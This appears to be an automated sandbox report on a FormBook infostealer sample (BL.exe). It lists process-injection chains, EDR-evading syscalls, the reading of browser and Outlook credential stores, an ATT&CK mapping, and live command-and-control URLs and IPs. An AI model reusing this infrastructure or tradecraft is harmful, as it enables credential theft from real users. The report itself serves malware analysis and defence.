            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Users\user\Desktop\BL.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\schtasks.exe Thread register set: target process: 5900
            Source: C:\Windows\SysWOW64\schtasks.exe Thread APC queued: target process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
            Source: C:\Users\user\Desktop\BL.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 28E4008
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\BL.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
            Source: BL.exe, OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: BL.exe Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\schtasks.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\schtasks.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: BL.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: BL.exe Binary or memory string: WIN_XP
            Source: BL.exe Binary or memory string: WIN_XPe
            Source: BL.exe Binary or memory string: WIN_VISTA
            Source: BL.exe Binary or memory string: WIN_7

            Remote Access Functionality

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\BL.exe Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
            MITRE ATT&CK Matrix (techniques listed by tactic; the number in parentheses is the count the report shows next to a matched technique, unnumbered entries are the matrix's unmatched cells)

            • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
            • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
            • Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
            • Execution: Native API (3), Command and Scripting Interpreter (2), Scheduled Task/Job (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
            • Persistence: DLL Side-Loading (1), Valid Accounts (2), Scheduled Task/Job (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
            • Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Scheduled Task/Job (1), Scheduled Task/Job, At
            • Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
            • Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
            • Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (241), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
            • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
            • Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
            • Command and Control: Ingress Tool Transfer (5), Encrypted Channel (1), Non-Application Layer Protocol (5), Application Layer Protocol (5), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
            • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            • Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
            Behavior Graph ID: 1538723, Sample: BL.exe, Start date: 21/10/2024, Architecture: WINDOWS, Score: 100

            • Sample-level nodes: www.sailforever.xyz, www.launchdreamidea.xyz and 19 other IPs or domains; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures. www.launchdreamidea.xyz: Performs DNS queries to domains with low reputation.
            • BL.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Contains functionality to detect sleep reduction / modifications. Starts svchost.exe.
            • svchost.exe (started by BL.exe): Maps a DLL or memory area into another process. Injects into OmmtmfniIsg.exe.
            • OmmtmfniIsg.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR). Starts schtasks.exe.
            • schtasks.exe (started by OmmtmfniIsg.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into OmmtmfniIsg.exe and starts firefox.exe.
            • OmmtmfniIsg.exe (injected by schtasks.exe): Found direct / indirect Syscall (likely to bypass EDR). Contacts www.sailforever.xyz (103.106.67.112, ports 49995, 49998, 49999, VOYAGERNET-AS-AP Voyager Internet Ltd NZ, New Zealand), www.givingaway123.net (103.224.182.242, ports 57337, 57338, 57339, TRELLIAN-AS-AP Trellian Pty Limited AU, Australia) and 8 other IPs or domains.
            • firefox.exe (started by schtasks.exe).

            Antivirus detection (Source / Detection / Scanner / Label / Link):
            • BL.exe / 21% / ReversingLabs / Win32.Trojan.Autoitinject
            • BL.exe / 100% / Joe Sandbox ML
            No Antivirus matches

            URL reputation (Source / Detection / Scanner / Label / Link):
            • https://duckduckgo.com/chrome_newtab / 0% / URL Reputation / safe
            • https://duckduckgo.com/ac/?q= / 0% / URL Reputation / safe
            • https://duckduckgo.com/favicon.ico and https://duckduckgo.com/?q= / 0% / URL Reputation / safe
            • https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= / 0% / URL Reputation / safe
            • https://www.ecosia.org/newtab/ / 0% / URL Reputation / safe
            • https://ac.ecosia.org/autocomplete?q= / 0% / URL Reputation / safe
            • https://ch.search.yahoo.com/favicon.ico and https://ch.search.yahoo.com/search / 0% / URL Reputation / safe
            • https://cdn.ecosia.org/assets/images/ico/favicon.ico and https://www.ecosia.org/search?q= / 0% / URL Reputation / safe
                                                                                                    unknown
                                                                                                    http://www.drevohome.shop/v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0true
                                                                                                      unknown
                                                                                                      http://www.booosted.xyz/12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0true
                                                                                                        unknown
                                                                                                        http://www.djazdgc.tokyo/0628/true
                                                                                                          unknown
                                                                                                          http://www.ethetf.digital/m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0true
                                                                                                            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.icann.org/resources/pages/non-response-2014-01-29-en | OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://emailverification.info/ | OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000040B0000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domains | schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.givingaway123.net/1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2 | OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003744000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.productanalytics.pro | OmmtmfniIsg.exe, 00000006.00000002.4649388492.0000000004B63000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP | OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000002F6A000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=stocksm.fun | schtasks.exe, 00000004.00000002.4648172740.0000000004040000.00000004.10000000.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.0000000003420000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | schtasks.exe, 00000004.00000002.4650522552.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
8.210.49.139 | longg002.cn | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
103.106.67.112 | www.sailforever.xyz | New Zealand | 56030 | VOYAGERNET-AS-APVoyagerInternetLtdNZ | true
209.74.64.187 | www.jagdud.store | United States | 31744 | MULTIBAND-NEWHOPEUS | true
65.21.196.90 | 030002837.xyz | United States | 199592 | CP-ASDE | true
94.23.162.163 | www.drevohome.shop | France | 16276 | OVHFR | true
188.114.96.3 | www.launchdreamidea.xyz | European Union | 13335 | CLOUDFLARENETUS | true
103.224.182.242 | www.givingaway123.net | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
217.70.184.50 | unknown | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | true
52.13.151.179 | www.rudemyvague.info | United States | 16509 | AMAZON-02US | true
3.33.130.190 | booosted.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538723
Start date and time: 2024-10-21 17:23:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: BL.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 38
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.23, 20.190.159.2, 20.190.159.64, 20.190.159.4, 20.190.159.71, 20.190.159.0, 40.126.31.73
• Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target OmmtmfniIsg.exe, PID 5196 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: BL.exe
Time | Type | Description
11:25:07 | API Interceptor | 12636287x Sleep call for process: schtasks.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
103.106.67.112 | BILL OF LADDING.exe | malicious | FormBook | www.sailforever.xyz/hshp/
209.74.64.187 | rDRAWINGDWGSINC.exe | malicious | FormBook | www.turnnex.online/dhzn/
209.74.64.187 | ROQ_972923.exe | malicious | FormBook | www.goldpal.xyz/ym9o/
209.74.64.187 | BILL OF LADDING.exe | malicious | FormBook | www.jagdud.store/qxse/
209.74.64.187 | PO59458.exe | malicious | FormBook | www.cotxot.info/fqdb/
209.74.64.187 | FDA.exe | malicious | FormBook | www.selectox.xyz/b26r/
